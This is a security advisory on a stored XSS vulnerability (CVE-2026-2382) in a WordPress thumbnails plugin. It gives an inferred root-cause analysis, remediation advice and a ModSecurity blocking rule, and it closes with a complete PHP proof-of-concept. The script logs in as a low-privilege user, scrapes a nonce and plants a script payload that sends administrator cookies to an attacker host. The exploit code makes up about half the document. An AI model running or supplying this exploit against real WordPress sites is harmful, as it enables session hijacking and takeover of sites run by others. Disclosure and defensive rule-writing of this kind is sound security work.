Atomic Edge analysis of CVE-2026-2382 (metadata-based): This vulnerability affects the FPW Category Thumbnails plugin for WordPress, versions 1.9.5 and earlier. The plugin fails to properly sanitize user input passed via the ‘id’ parameter to the ‘fpw_fs_get_file’ AJAX action. An authenticated attacker with Subscriber-level access or higher can inject arbitrary JavaScript that executes when an administrator views the plugin’s settings page. The CVSS score of 6.4 reflects a medium-to-high severity with network attack vector, low complexity, and changed scope affecting confidentiality and integrity.
The root cause is improper neutralization of user-supplied input during web page generation, classified as CWE-79 (Cross-site Scripting). Based on the description, the ‘id’ parameter of the ‘fpw_fs_get_file’ AJAX action lacks sufficient sanitization and output escaping. Atomic Edge analysis infers that the plugin most likely stores the unsanitized value in a database field or an option that is later rendered on the admin settings page without escaping. This pattern is common in WordPress plugins that use AJAX handlers to accept file identifiers or other input that gets displayed back in the admin interface. No code diff is available to confirm, but the CWE classification strongly indicates the vulnerability follows a stored XSS pattern where the malicious payload persists and triggers on a subsequent page load.
Exploitation occurs through WordPress’s standard AJAX handler at /wp-admin/admin-ajax.php. An attacker with Subscriber-level account first obtains a valid WordPress nonce for the AJAX action if required, or exploits the possibility that nonce verification is missing. The attacker sends a POST request with action=fpw_fs_get_file and an id parameter containing a JavaScript payload, such as alert(1) or more sophisticated code for stealing cookies or performing admin actions. The plugin then stores this payload without sanitization. When an administrator navigates to the plugin’s settings page (which renders the stored value without escaping), the injected script executes in the admin’s browser session.
Remediation requires the plugin developer to implement proper input sanitization and output escaping. The ‘id’ parameter should be sanitized using WordPress functions like sanitize_text_field() or sanitize_key() depending on expected input type. Before output on the settings page, the value must be escaped with esc_html() or esc_attr() to neutralize any HTML or JavaScript. Additionally, capability checks should be strengthened to ensure only users with appropriate permissions (like admin-level) can trigger actions that store data displayed in admin panels. Since no patched version exists, users must remove or replace the plugin.
The impact of successful exploitation allows an authenticated low-privilege user to execute arbitrary JavaScript in the context of an administrator’s session. This can lead to session hijacking, theft of authentication cookies, forced administrator actions (like creating new admin accounts), defacement of settings pages, or injection of malicious redirects or keyloggers. The changed scope in the CVSS vector indicates the attack can affect resources beyond the vulnerable component, potentially compromising the entire WordPress installation. Administrators are advised to disable the plugin immediately until a security update is released.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-2382 (metadata-based)
# Block stored XSS via fpw_fs_get_file AJAX action by matching the action and script tags in id parameter
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20262382,phase:2,deny,status:403,chain,msg:'CVE-2026-2382 FPW Category Thumbnails Stored XSS via fpw_fs_get_file',severity:'CRITICAL',tag:'CVE-2026-2382'"
SecRule ARGS_POST:action "@streq fpw_fs_get_file" "chain"
SecRule ARGS_POST:id "@rx <script[^>]*>" "t:lowercase"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2382 - FPW Category Thumbnails <= 1.9.5 - Authenticated (Subscriber+) Stored XSS via 'id' Parameter
// Configuration
$target_url = 'http://example.com'; // Change to target WordPress site
$username = 'subscriber_user'; // Attacker's username (Subscriber or above)
$password = 'password123'; // Attacker's password
// Payload: Stored XSS that will execute when admin visits settings page
$payload = '<script>fetch("http://attacker.com/steal?cookie="+document.cookie)</script>';
// Step 1: Authenticate with WordPress (get cookies and nonce)
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => 1
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);
// Step 2: Obtain AJAX nonce for admin-ajax.php (if needed; could be embedded in dashboard page)
// Note: Many plugins expose nonces in the admin footer. We try to extract from a logged-in page.
$admin_url = $target_url . '/wp-admin/';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, false);
$dashboard = curl_exec($ch);
curl_close($ch);
// Extract the wp_ajax nonce (specific to wp_ajax_fpw_fs_get_file, or a general AJAX nonce)
// Assumption: Nonce name might be 'fpw_fs_get_file_nonce' or '_wpnonce' or 'ajax_nonce'
preg_match('/"ajax_nonce":"([^"]+)"/', $dashboard, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';
if (empty($nonce)) {
// Fallback: try to find in page source
preg_match('/name="_wpnonce" value="([^"]+)"/', $dashboard, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';
}
// Step 3: Trigger the vulnerable AJAX action with the XSS payload
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
'action' => 'fpw_fs_get_file',
'id' => $payload, // Malicious payload in the 'id' parameter
);
if (!empty($nonce)) {
$post_data['_ajax_nonce'] = $nonce; // Include nonce if we found one
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, false);
$result = curl_exec($ch);
curl_close($ch);
echo "[+] Exploit sent to $ajax_url with payload: $payloadn";
echo "[+] Response: " . htmlspecialchars($result) . "n";
echo "[+] When admin visits the plugin settings page, the XSS triggers.n";
?>
